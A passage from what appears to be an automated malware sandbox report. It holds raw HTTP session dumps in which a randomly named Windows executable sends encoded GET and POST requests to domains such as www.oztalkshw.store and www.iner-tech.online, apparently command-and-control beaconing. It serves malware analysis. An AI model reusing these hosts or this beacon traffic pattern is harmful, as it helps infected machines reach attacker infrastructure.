ff e3 d4 b9 f6 d7 53 b8 fa af 7f fe 3f ff fc bf fe f9 3f f0 ea cd 19 [TRUNCATED]
                                                                                      Data Ascii: c000[sF0_Ap}83cg&64D" ROl}_/mf7R#M@UfeVVVfVUkV7Fzngfw-5`zwkrv_~`97gpt}23[oz~0wce[[^]'0(ug>7o9 ?8M]k7SrG(Xm??S??m2w=| w3W+wMnla~>]7o|B<U],/rsf:&n*lwOz>m~S-LfY9S2& |=]YYKYa4NcGXD)tCe"JPG3oLbzm>xOeXLw+zExPomx0:u&w"^W{78YZl@a-HC]f|= ul)\x*ht6,k^e`Lvk@eps L5h&kq?;[,LUiL6%Im"E5]c_0wZTvk,D#eMm/POD&p^IVjRUBCIHr]AuHw^Ch"#<,vE+4>R-Ou91rQ [TRUNCATED]
                                                                                      Nov 25, 2024 13:58:44.833461046 CET1236INData Raw: 15 b2 4d 6b 3c 81 d4 b6 93 a9 46 a3 d6 35 26 9d 4c d2 a1 ef 31 f0 03 03 cc 94 b0 89 23 61 8f 89 aa 31 fc 44 6c a2 e9 2d 3d 7c 35 21 91 0d f2 83 d8 62 36 98 bb 03 c2 95 01 82 a7 02 bf 8b f0 18 7c 6c 86 c4 36 5d 67 20 aa 14 74 63 72 d9 a0 16 89 4c
                                                                                      Data Ascii: Mk<F5&L1#a1Dl-=|5!b6|l6]g tcrLcM$vahBZ(13%8Kd%5&A2dl[:J,A<~,1Y.0=D]U9FTTs5L@O)fG:RvWaIEzUe9
                                                                                      Nov 25, 2024 13:58:44.833605051 CET1236INData Raw: 8d f2 b0 0d 75 36 39 b5 be f3 36 b9 28 48 32 93 51 6e df 7c 12 06 b9 5d b2 01 75 b7 31 5e 56 6b 7f 43 3c c3 8a 27 37 c2 23 ec cf 6b 80 37 ec 87 a8 e9 07 34 bc 33 7c 78 6a a3 db 3e ee f6 6c 36 43 b7 61 1f 84 0d 3f 9c a1 9d 61 c2 d3 1b d9 11 fa 67
                                                                                      Data Ascii: u696(H2Qn|]u1^VkC<'7#k743|xj>l6Ca?ag6BCYV<Qfa_$?!36Fn<^a_?e?18lb=3N_g>$g!\k$gTi<G,5\i]r#tQ\-
                                                                                      Nov 25, 2024 13:58:44.833616972 CET1236INData Raw: c5 dc 10 b6 70 fa 0e 68 4f ee 50 35 6e 10 53 e8 bd 1a e8 93 3a 4f ac ed 60 0a d3 d7 c3 7a 72 47 a9 a6 3d bb dc a3 a6 a4 30 85 f5 d9 9a 73 6c 57 a8 be 19 4f ee 00 35 6c 0e 53 cc b2 1a e4 d3 3a 3b cc 0d 61 8a 78 ef 00 f6 e4 8e 4d e3 06 31 c5 c6 ab
                                                                                      Data Ascii: phOP5nS:O`zrG=0slWO5lS:;axM1>LK'vN[R<#E'N3hS;SHP{I&|4s=PJLAZl^N2iIKC7Hy7!
                                                                                      Nov 25, 2024 13:58:44.833630085 CET896INData Raw: 05 bc 33 3b 1c ef 2b 6b 3e b7 cd 29 29 40 df c4 32 11 77 37 66 ea af 4d e3 03 79 e3 46 e1 15 26 e1 fb d6 e8 7d f2 12 11 24 35 55 d6 33 f1 9d 1f 38 de 71 de 9e 02 a2 eb 0f 56 40 09 f0 57 ae 1b 2c c9 33 27 00 ef d2 32 7c 73 3e 1d ac dc df 07 ae ff
                                                                                      Data Ascii: 3;+k>))@2w7fMyF&}$5U38qV@W,3'2|s>1_+h1!3\CfIpmW*({V*_ZC5(VXX6Lu:+**k{S`nTWnA|[U7ms]Zz03rWU-XnV~<iGj5
                                                                                      Nov 25, 2024 13:58:44.833642006 CET1236INData Raw: 28 d7 ea f0 7d c9 e1 ca 05 97 7f 40 a4 38 37 8d a4 96 17 99 f7 a0 17 81 0e 80 0b 2b 17 7a 3b ff da d9 d4 6a 71 36 66 1b 5e 90 90 6a 64 74 e1 6c 92 1b 4f 24 94 dc f6 8c ed 27 d0 de 66 0b e1 a5 dd 59 e7 b7 ef 5a 06 df 0f 20 fb 02 d9 9e 0d 2e f4 0d
                                                                                      Data Ascii: (}@87+z;jq6f^jdtlO$'fYZ .Q*0xC{0K7{Re9]*FEe,qqu(mmY@Ji&E;7WE#wBYwAxU|1s;t`3,@FBRzlsXH,
                                                                                      Nov 25, 2024 13:58:44.833659887 CET224INData Raw: 50 d6 da b1 62 08 d7 d5 94 c6 55 9b f1 36 ae 56 c9 61 43 36 e6 33 61 37 de 6a 3e 8f d4 b1 6c cc 9a b7 7c 27 b7 e3 9a b5 3c af 60 5c f6 45 2c f4 15 2b d3 62 ed f0 0d 2d 25 55 d9 18 4d cb 56 72 d7 1c 99 d7 8b a2 40 94 63 88 a8 9c d4 a1 4a 78 51 89
                                                                                      Data Ascii: PbU6VaC63a7j>l|'<`\E,+b-%UMVr@cJxQ0IKYii,dDbb0J<wfhq-$S(z1qoRRPE\T5b~vZp!71U?:vg{("4Y}P
                                                                                      Nov 25, 2024 13:58:44.833669901 CET1236INData Raw: fa a3 e6 1f 62 5e d8 2e 98 01 8b 20 db 06 98 43 6e cc 09 1a e4 86 37 b8 c1 84 34 a6 13 f4 c6 c2 dc bc e1 bc 9b 6b a3 27 a9 2a 17 fd e3 c5 3e 17 0e 84 fe 0e 85 b1 a3 09 7b aa af e3 12 46 46 66 25 61 b5 d3 6b 85 76 88 b3 e7 94 e9 5d 43 96 e5 a2 e1
                                                                                      Data Ascii: b^. Cn74k'*>{FFf%akv]CWaY}JMMs$m-bd,/L#u}D)l(f,v=+<Gije8Z.UiV9Z#)h%,X[XWf"*^X^',\S)L
                                                                                      Nov 25, 2024 13:58:44.833709002 CET224INData Raw: 34 1e f0 32 80 57 e5 11 5e 88 22 af 0d 55 7c 61 19 14 53 00 9c 32 1a 86 d7 f8 39 1a 21 6c 91 1f 0a d2 00 9e 69 23 72 77 2c 0d 92 22 63 69 39 d0 86 bc 22 48 33 d0 43 b2 04 35 06 50 43 51 47 03 15 ca 28 d1 0f fc 1a 29 06 7e 0d 87 9d f0 4b e8 08 e2
                                                                                      Data Ascii: 42W^"U|aS29!li#rw,"ci9"H3C5PCQG()~K%U=%{{EQH51DNxd,<pf6HrXA`{T#9aHOlp#g+/dH&WPF(@9+*
                                                                                      Nov 25, 2024 13:58:44.833724976 CET1236INData Raw: 70 56 12 c9 4d 65 90 14 50 80 ad d0 f2 11 72 55 54 29 53 45 75 a0 80 44 84 97 22 ca 0d f0 10 f8 2c 03 61 32 b6 7a 0c 02 a0 02 23 c6 44 78 46 82 9c e6 e8 3b f9 9d f6 ee fb 22 47 65 94 9e 61 67 34 82 66 cd 06 40 81 4c 7a 0b f8 2a 2a 80 62 00 5d 34
                                                                                      Data Ascii: pVMePrUT)SEuD",a2z#DxF;"Geag4f@Lz**b]4G"( l PNF2@A0<K:<!P3 @'P4h!(,70P ]WqI[0t8!--Q.[70D48f#c6p~]
                                                                                      Nov 25, 2024 13:58:44.953769922 CET1236INData Raw: c2 0c ad 8d 46 49 fb d0 32 42 e3 1d d8 39 52 6f 65 f4 37 46 3f 48 22 1a 51 7f 93 c0 f4 50 e4 b0 ec f0 16 5c 12 71 3c fc 01 4c e6 f1 70 74 3b 06 13 43 53 7e a0 70 a0 b7 55 7e ac 0d 7f 10 6e c1 a6 06 2b 41 f9 33 f4 1d 78 78 b2 fc 83 a8 01 03 55 68
                                                                                      Data Ascii: FI2B9Roe7F?H"QP\q<Lpt;CS~pU~n+A3xxUh?KIUNSM@?Hm`PET65*l@GA>+Eo6?Cz0,?f_u+]x;X@]!u>CXc


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      44192.168.2.84976137.140.192.206806380C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 25, 2024 13:58:46.112874031 CET514OUTGET /2qq5/?UbRxm=nJlPXscYNUK/x8n7HNvxQXymHirKKOa5d/gbSo8R0WshpRq0xpi0L/Z346LJbhmS5oNKw9fZ+xJ2aA6R/PeeOGlkwsFyxNt6h/Yl654mufiUH4F6GX917Tf2jY4/Q+imsA==&YvA4=xnL8AvI8CJiPEDU HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.iner-tech.online
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Nov 25, 2024 13:58:47.503057957 CET1236INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Mon, 25 Nov 2024 12:58:47 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Vary: Accept-Encoding
                                                                                      Data Raw: 66 65 62 31 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 64 61 74 61 2d 70 61 6e 65 6c 2d 75 72 6c 3d 22 68 74 74 70 73 3a 2f 2f 73 65 72 76 65 72 31 31 38 2e 68 6f 73 74 69 6e 67 2e 72 65 67 2e 72 75 2f 6d 61 6e 61 67 65 72 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 26 6e 62 73 70 3b d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 2f 2a 21 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a [TRUNCATED]
                                                                                      Data Ascii: feb1<!doctype html><html lang="ru" class="is_adaptive" data-panel-url="https://server118.hosting.reg.ru/manager"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="robots" content="noindex"><title> &nbsp;</title><style media="all">/*!*************************************************************************************************************************************************************************************************!*\ !*** css ./node_modules/css-loader/index.js??clonedRuleSet-6.use[1]!./node_modules/postcss-loader/src/index.js!./node_modules/less-loader/dist/cjs.js!./bem/blocks.adaptive/b-page/b-page.less ***! \*************************************************************************************************************************************************************************************************/.b-page{display:flex;flex-direction:column;width:100%;min-width:320px;height:100%;padding:57p [TRUNCATED]
                                                                                      Nov 25, 2024 13:58:47.503102064 CET1236INData Raw: 70 78 20 49 6e 74 65 72 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 48 65 6c 76 65 74 69 63 61 2c 46 72 65 65 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 2d 77 65 62 6b 69
                                                                                      Data Ascii: px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;background:#fff;-webkit-tap-highlight-color:transparent}html:not(.is_adaptive) .b-page{overflow-x:hidden}@media (min-width:1024px){.is_adaptive .b-page{overflow-x:hidden}}.b-page_type
                                                                                      Nov 25, 2024 13:58:47.503119946 CET448INData Raw: 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 30 32 34 70 78 29 7b 2e 69 73 5f 61 64 61 70 74 69 76 65 20 2e 62 2d 70 61 67 65 5f 6d 6f 62 69 6c 65 2d 6f 76 65 72 66 6c 6f 77 5f 68 69 64 64 65 6e 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65
                                                                                      Data Ascii: ia (min-width:1024px){.is_adaptive .b-page_mobile-overflow_hidden{overflow:visible}}.ie .b-page{display:block}.b-page__footer-down{flex:1 0 auto;overflow:hidden}.ie .b-page__footer-down{min-height:100%}@media (min-width:1024px){.is_adaptive .b
                                                                                      Nov 25, 2024 13:58:47.503135920 CET1236INData Raw: 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 7d 2e 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 7b 70 61 64 64 69 6e 67
                                                                                      Data Ascii: -page__content-wrapper{margin:0 auto}.b-page__content-wrapper_style_indent{padding-right:24px;padding-left:24px}.b-page__content-wrapper_style_indent_new{padding-right:48px;padding-left:48px}html:not(.is_adaptive) .b-page__content-wrapper{widt
                                                                                      Nov 25, 2024 13:58:47.503153086 CET1236INData Raw: 2d 73 65 72 69 66 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 35 38 70 78 7d 2e 62 2d 70 61 67 65 5f 5f 61 64 64 69 74 69 6f 6e 2d 74 69 74 6c 65 2d 6c 69 6e 6b 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 2e 62 2d 70 61 67 65 5f
                                                                                      Data Ascii: -serif;line-height:58px}.b-page__addition-title-link{text-decoration:none}.b-page__addition-title-link:hover{text-decoration:underline}.b-page__addition-title .b-title{display:inline}.b-page__addition-item{position:relative;float:right;padding
                                                                                      Nov 25, 2024 13:58:47.503171921 CET448INData Raw: 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a
                                                                                      Data Ascii: **********************************************************************************************************************!*\ !*** css ./node_modules/css-loader/index.js??clonedRuleSet-6.use[1]!./node_modules/postcss-loader/src/index.js!./node_m
                                                                                      Nov 25, 2024 13:58:47.503186941 CET1236INData Raw: 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2f 0a 2e 62 2d 74 65 78 74 7b 70 61 64 64 69 6e 67 3a 30 3b
                                                                                      Data Ascii: **************************************************************/.b-text{padding:0;color:#364364;font:15px/24px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin:0 0 24px}.b-text.b-text_margin_top{margin-top:24px}.b-text_size_gian
                                                                                      Nov 25, 2024 13:58:47.503220081 CET1236INData Raw: 6c 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 48 65 6c 76 65 74 69 63 61 2c 46 72 65 65 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 33 36 70 78 7d 2e 62 2d 74 65 78 74 5f 73 69 7a 65 5f 6c 61 72
                                                                                      Data Ascii: l,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:36px}.b-text_size_large-compact.b-text_margin_top,.b-text_size_large.b-text_margin_top{margin-top:36px}.b-text_size_large-compact{font:24px/30px Inter,Arial,Helvetica Neue,Helvetica,
                                                                                      Nov 25, 2024 13:58:47.503236055 CET448INData Raw: 73 2c 73 61 6e 73 2d 73 65 72 69 66 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 38 70 78 7d 2e 62 2d 74 65 78 74 5f 6d 61 72 67 69 6e 5f 6e 6f 6e 65 7b 6d 61 72 67 69 6e 3a 30 7d 68 74 6d 6c 3a 6e 6f 74 28 2e 69 73 5f 61 64 61 70 74 69 76 65
                                                                                      Data Ascii: s,sans-serif;margin-bottom:18px}.b-text_margin_none{margin:0}html:not(.is_adaptive) .b-text_size_giant\@desktop{font:72px/84px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:84px}html:not(.is_adaptive) .b-text_size_gian
                                                                                      Nov 25, 2024 13:58:47.503350973 CET1236INData Raw: 61 6c 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 48 65 6c 76 65 74 69 63 61 2c 46 72 65 65 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 38 34 70 78 7d 68 74 6d 6c 3a 6e 6f 74 28 2e 69 73 5f 61 64
                                                                                      Data Ascii: al,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:84px}html:not(.is_adaptive) .b-text_size_huge\@desktop{font:48px/60px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:60px}html:not(.is_adaptive) .b-text_size
                                                                                      Nov 25, 2024 13:58:47.625176907 CET1236INData Raw: 65 78 74 5f 6d 61 72 67 69 6e 5f 74 6f 70 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 33 36 70 78 7d 68 74 6d 6c 3a 6e 6f 74 28 2e 69 73 5f 61 64 61 70 74 69 76 65 29 20 2e 62 2d 74 65 78 74 5f 73 69 7a 65 5f 6c 61 72 67 65 2d 63 6f 6d 70 61 63 74 5c 40
                                                                                      Data Ascii: ext_margin_top{margin-top:36px}html:not(.is_adaptive) .b-text_size_large-compact\@desktop{font:24px/30px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:36px}html:not(.is_adaptive) .b-text_size_medium\@desktop{font:20px/


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      45192.168.2.849762199.59.243.227806380C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 25, 2024 13:58:54.294629097 CET767OUTPOST /3agz/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.oztalkshw.store
                                                                                      Origin: http://www.oztalkshw.store
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 206
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.oztalkshw.store/3agz/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Data Raw: 55 62 52 78 6d 3d 42 2f 69 45 62 61 33 4d 47 35 44 32 66 69 57 31 53 2b 55 34 45 50 73 39 44 33 4a 4b 52 71 68 70 64 67 39 37 53 5a 51 72 73 79 59 48 69 65 4a 68 42 5a 4c 65 69 49 2f 37 30 6e 4e 39 53 32 39 63 52 5a 52 37 53 4b 2b 6a 41 50 78 5a 79 67 37 43 35 51 6f 6f 71 75 76 35 42 6f 73 33 63 35 49 65 39 58 31 35 33 2b 4e 59 33 39 63 74 68 51 70 65 36 4b 56 66 69 38 6d 55 70 75 38 7a 64 42 46 51 32 75 68 33 63 37 32 63 38 35 7a 4f 75 70 7a 6f 66 61 6e 65 42 54 73 69 46 37 4a 35 31 47 46 50 49 46 36 61 7a 7a 53 67 70 36 4c 6d 42 67 41 53 4b 37 74 48 4b 48 4d 39 46 7a 6c 43 35 55 67 6d 33 4a 75 62 4a 67 30 3d
                                                                                      Data Ascii: UbRxm=B/iEba3MG5D2fiW1S+U4EPs9D3JKRqhpdg97SZQrsyYHieJhBZLeiI/70nN9S29cRZR7SK+jAPxZyg7C5Qooquv5Bos3c5Ie9X153+NY39cthQpe6KVfi8mUpu8zdBFQ2uh3c72c85zOupzofaneBTsiF7J51GFPIF6azzSgp6LmBgASK7tHKHM9FzlC5Ugm3JubJg0=
                                                                                      Nov 25, 2024 13:58:55.373055935 CET1236INHTTP/1.1 200 OK
                                                                                      date: Mon, 25 Nov 2024 12:58:54 GMT
                                                                                      content-type: text/html; charset=utf-8
                                                                                      content-length: 1126
                                                                                      x-request-id: c187ec25-ece2-49c1-9fe2-769a252d629d
                                                                                      cache-control: no-store, max-age=0
                                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                                      vary: sec-ch-prefers-color-scheme
                                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_rAPZPJLM10nHtxjvQ0fGtV16bPN0t9j3bGDtYHLrMqbkz14+yRjitYz4diiRR8W0s0LfjcnLpb/2LxG8HVulUg==
                                                                                      set-cookie: parking_session=c187ec25-ece2-49c1-9fe2-769a252d629d; expires=Mon, 25 Nov 2024 13:13:55 GMT; path=/
                                                                                      connection: close
                                                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 72 41 50 5a 50 4a 4c 4d 31 30 6e 48 74 78 6a 76 51 30 66 47 74 56 31 36 62 50 4e 30 74 39 6a 33 62 47 44 74 59 48 4c 72 4d 71 62 6b 7a 31 34 2b 79 52 6a 69 74 59 7a 34 64 69 69 52 52 38 57 30 73 30 4c 66 6a 63 6e 4c 70 62 2f 32 4c 78 47 38 48 56 75 6c 55 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_rAPZPJLM10nHtxjvQ0fGtV16bPN0t9j3bGDtYHLrMqbkz14+yRjitYz4diiRR8W0s0LfjcnLpb/2LxG8HVulUg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                      Nov 25, 2024 13:58:55.373173952 CET579INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzE4N2VjMjUtZWNlMi00OWMxLTlmZTItNzY5YTI1MmQ2MjlkIiwicGFnZV90aW1lIjoxNzMyNTM5NT


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      46192.168.2.849763199.59.243.227806380C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 25, 2024 13:58:57.165107965 CET787OUTPOST /3agz/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.oztalkshw.store
                                                                                      Origin: http://www.oztalkshw.store
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 226
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.oztalkshw.store/3agz/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Data Raw: 55 62 52 78 6d 3d 42 2f 69 45 62 61 33 4d 47 35 44 32 65 48 47 31 54 66 55 34 44 76 73 2b 64 6e 4a 4b 59 4b 67 67 64 67 68 37 53 59 45 37 76 42 38 48 73 65 5a 68 41 63 2f 65 76 6f 2f 37 67 33 4e 38 63 57 39 4c 52 59 73 47 53 4c 53 6a 41 50 31 5a 79 68 4c 43 35 6a 41 6e 71 2b 76 37 59 34 73 31 42 4a 49 65 39 58 31 35 33 2b 5a 2b 33 39 45 74 67 68 5a 65 67 72 56 63 6b 4d 6e 6d 75 75 38 7a 58 52 46 63 32 75 68 56 63 2f 75 32 38 37 4c 4f 75 72 37 6f 65 4f 7a 64 4c 54 73 6f 4b 62 4a 73 31 7a 35 4c 51 6c 4b 41 77 46 4f 36 33 4d 66 72 4e 32 78 34 51 5a 6c 42 4a 48 6b 57 46 77 4e 30 38 6a 39 4f 74 71 2b 72 58 33 67 50 2f 44 56 63 43 75 50 70 74 36 64 6a 73 55 61 6d 66 41 6b 61
                                                                                      Data Ascii: UbRxm=B/iEba3MG5D2eHG1TfU4Dvs+dnJKYKggdgh7SYE7vB8HseZhAc/evo/7g3N8cW9LRYsGSLSjAP1ZyhLC5jAnq+v7Y4s1BJIe9X153+Z+39EtghZegrVckMnmuu8zXRFc2uhVc/u287LOur7oeOzdLTsoKbJs1z5LQlKAwFO63MfrN2x4QZlBJHkWFwN08j9Otq+rX3gP/DVcCuPpt6djsUamfAka
                                                                                      Nov 25, 2024 13:58:58.413799047 CET1236INHTTP/1.1 200 OK
                                                                                      date: Mon, 25 Nov 2024 12:58:57 GMT
                                                                                      content-type: text/html; charset=utf-8
                                                                                      content-length: 1126
                                                                                      x-request-id: e9a5b70b-6a60-47ec-8bf8-89517e62f063
                                                                                      cache-control: no-store, max-age=0
                                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                                      vary: sec-ch-prefers-color-scheme
                                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_rAPZPJLM10nHtxjvQ0fGtV16bPN0t9j3bGDtYHLrMqbkz14+yRjitYz4diiRR8W0s0LfjcnLpb/2LxG8HVulUg==
                                                                                      set-cookie: parking_session=e9a5b70b-6a60-47ec-8bf8-89517e62f063; expires=Mon, 25 Nov 2024 13:13:58 GMT; path=/
                                                                                      connection: close
